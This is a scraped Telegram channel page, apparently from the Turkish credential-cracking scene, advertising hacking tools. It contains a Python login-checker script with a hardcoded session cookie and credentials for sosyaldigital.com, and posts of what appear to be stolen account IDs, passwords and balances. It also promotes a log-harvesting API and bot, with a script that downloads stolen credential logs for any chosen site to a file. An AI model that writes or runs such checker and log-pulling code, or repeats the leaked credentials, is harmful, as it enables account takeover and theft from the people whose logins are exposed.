𝐖𝐈𝐙𝐀𝐑𝐃 𝐓𝐎𝐎𝐋
کانال بسته
اطلاعاتی وجود ندارد
مشترکین
-5024 ساعت
+7187 روز
+84930 روز
آرشیو پست ها
🔥 Sosyal Digital Login api ;
import requests
response = requests.post(
'https://sosyaldigital.com/action/',
cookies={'PHPSESSID': '6048c826057be616e9238aec096f041e'},
headers={
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'origin': 'https://sosyaldigital.com',
'referer': 'https://sosyaldigital.com/profile/',
'user-agent': 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Mobile Safari/537.36',
},
data={
'ns_action': 'customer_login',
'customer[mail]': 't5omas@mail.com',
'customer[password]': 'thomas',
}
)
print(response.text)61948030146:Ag300391 | Bakiye = 31.61₺
43228209190:Kaangyk63282011 | Bakiye = 30.09₺
2x bilyoner.com Hit
Kod Yazmasını Bilen Admin Aranıyor En Az 1 Programlama Dili Bilmesi Gerekli @wizardxcoder
✅ Log Bot'u Aktif Şuan Eskisinden Daha Hızlı Ve Daha Stabil Rahatlıkla Kullanabilirsiniz İyi Kullanımlar. ✅ @wizard_log_bot
✅ Log Çekme Api Aktif; https://wizardxcoder.com/log.php?key=d628b1ec105cb8ea&site=crackturkey.com
🔥 Py Kullanımı;
import requests
site = input("Log çekmek istediğiniz siteyi girin (exxen.com): ")
api = requests.get(f"https://wizardxcoder.com/log.php?key=d628b1ec105cb8ea&site={site}").json()
print(f"Log sayısı: {api['log_count']}")
for log in api["logs"]:
with open(f"/sdcard/{site}_logs.txt","a") as yazdır:
yazdır.write(log+"\n")⛔ İstediğiniz Sitenin Ekran Görüntüsünü Alan Api; https://wizardxcoder.com/ss.php?url=exxen.com
🔥 Py Kullanımı;
import requests
token = input("Bot Tokeni Girin: ")
id = input("İd Girin: ")
site = input("Ekran Görüntüsü Almasını İstediğiniz Siteyi Girin (exxen.com): ")
api = requests.get(f"https://wizardxcoder.com/ss.php?url={site}").json()
if "screenshot" in api:
foto = api["screenshot"]
requests.post(f"https://api.telegram.org/bot{token}/sendPhoto?chat_id={id}&photo={foto}&caption=@wizardxcoder")
print("✅ Ekran Görüntüsü Bot'unuza Gönderildi!")
else:
print("❌ Hata Oluştu!")